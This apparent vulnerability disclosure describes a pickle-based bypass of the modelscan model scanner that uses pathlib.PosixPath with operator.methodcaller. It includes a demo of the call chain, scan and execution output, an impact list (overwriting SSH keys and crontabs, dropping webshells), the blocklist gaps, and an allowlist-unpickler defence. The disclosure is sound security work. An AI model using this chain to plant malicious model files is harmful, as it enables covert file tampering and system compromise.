Modelscan Bypass PoC: pathlib.PosixPath.write_text

Summary

This pickle file bypasses ProtectAI's modelscan scanner and achieves an arbitrary file write when loaded with pickle.load() or torch.load(..., weights_only=False).

Technique

Uses pathlib.PosixPath combined with operator.methodcaller("write_text", ...) to write arbitrary content to any file path writable by the loading process. Neither pathlib nor operator.methodcaller appears in modelscan's unsafe_globals blocklist.

Chain: operator.methodcaller("write_text", "<content>") applied to pathlib.PosixPath("<target_path>")
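The chain can be exercised directly in Python (no pickle needed) to see the mechanics. This is a safe sketch: the temp-file path below is an assumption for illustration, not the PoC's target path.

```python
import operator
import pathlib
import tempfile

# methodcaller("write_text", ...) binds the method name and the payload content...
caller = operator.methodcaller("write_text", "PWNED_VIA_PATHLIB")

# ...and applying it to a Path object performs the write.
# A temp file stands in for an attacker-chosen path here.
target = pathlib.Path(tempfile.gettempdir()) / "poc_demo.txt"
caller(target)  # equivalent to target.write_text("PWNED_VIA_PATHLIB")

print(target.read_text())  # PWNED_VIA_PATHLIB
target.unlink()
```

In the pickle payload, the same two calls are encoded as REDUCE operations, so the write happens as a side effect of deserialization.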

Scan Result

$ modelscan scan -p model.pkl
No issues found! 🎉

Execution Result

$ python3 -c "import pickle; pickle.load(open('model.pkl','rb'))"
$ cat /tmp/pwned_pathlib.txt
PWNED_VIA_PATHLIB

Impact

Arbitrary file write: can overwrite config files, crontabs, SSH authorized_keys, or drop webshells. Combined with pathlib.PosixPath.read_text (via a second methodcaller), it also enables arbitrary file read.

Blocklist Gaps

  1. pathlib module: entirely missing from unsafe_globals
  2. operator.methodcaller: not blocked (only operator.attrgetter is listed)
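Gaps like these make any blocklist brittle; the documented defense is an allowlist unpickler that overrides Unpickler.find_class. A minimal sketch, assuming a model format that only needs collections.OrderedDict (the allowlist contents are illustrative):

```python
import io
import pickle

# Permit only the globals a model file legitimately needs.
# This set is an illustrative assumption; extend it for your format.
SAFE_GLOBALS = {
    ("collections", "OrderedDict"),
}

class AllowlistUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        if (module, name) in SAFE_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(
            f"global {module}.{name} is not allowlisted"
        )

# A payload that reconstructs operator.methodcaller on load, as in the PoC:
class Payload:
    def __reduce__(self):
        import operator
        return (operator.methodcaller, ("write_text", "blocked-demo"))

payload = pickle.dumps(Payload())
try:
    AllowlistUnpickler(io.BytesIO(payload)).load()
except pickle.UnpicklingError as exc:
    print("rejected:", exc)
```

Unlike a blocklist, this rejects the operator.methodcaller import at find_class time regardless of which gadget module the payload reaches for.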